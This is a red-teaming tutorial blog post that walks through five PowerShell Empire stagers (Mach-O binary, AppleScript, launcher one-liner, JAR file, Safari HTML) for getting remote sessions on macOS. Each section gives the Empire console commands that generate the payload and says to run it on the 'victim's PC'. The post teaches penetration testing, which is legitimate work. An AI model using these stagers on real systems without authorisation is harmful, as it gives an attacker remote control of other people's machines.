PowerShell Empire, Red Teaming

Multiple Ways to Exploiting OSX using PowerShell Empire

In this article, we will learn multiple ways to Exploit OSX with PowerShell Empire. There are various stages provided in Empire for this purpose, and we will cover a few of them here. The method to attack OSX is similar to that of Windows, making it a versatile approach for penetration testers. For a beginner’s guide to pen-testing OSX, click here.

Table of Content

  • osx/macho
  • osx/applescript
  • osx/launcher
  • osx/jar
  • osx/safari_launcher

osx/macho

The first stage we will use to attack is osx/macho. This stage will create a Mach-O file, which is an executable format of binaries in OS X. This file format developers created specifically for OS X. This file format informs the system about the order in which it reads code and data into memory. So, this stage is quite useful when it comes to attacking OS X.

The listener creation is the same as Windows; use the HTTP listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :

Exploiting OSX with PowerShell Empire

osx/applescript

The next stage we will use is OSX/AppleScript. This stage will create a code in an AppleScript, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stage for pen-testing Mac. To create the malicious Apple script, run the following set of commands :

usestager osx/applescript
set Listener http
execute

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :

Exploiting OSX with PowerShell Empire

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :

osx/launcher

The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :

usestager osx/launcher
execute

copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :

Exploiting OSX with PowerShell Empire

osx/jar

The nest stager which we will use, is osx/jar. This stager creates a jar file which is a Java archive file. This file format serves compressed Java files that run as desired when extracted. This file extension specifically caters to Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :

usestager osx/jar
set Listener http
set OutFile out.jar
execute

The stager will create a jar file as described above; the attacker will execute the said file in the victim’s system, and you will have your session as shown in the image :

osx/safari_launcher

The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :

Exploiting OSX with PowerShell Empire

To learn more about PowerShell. Follow this Link.

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | and Researcher. Contact Here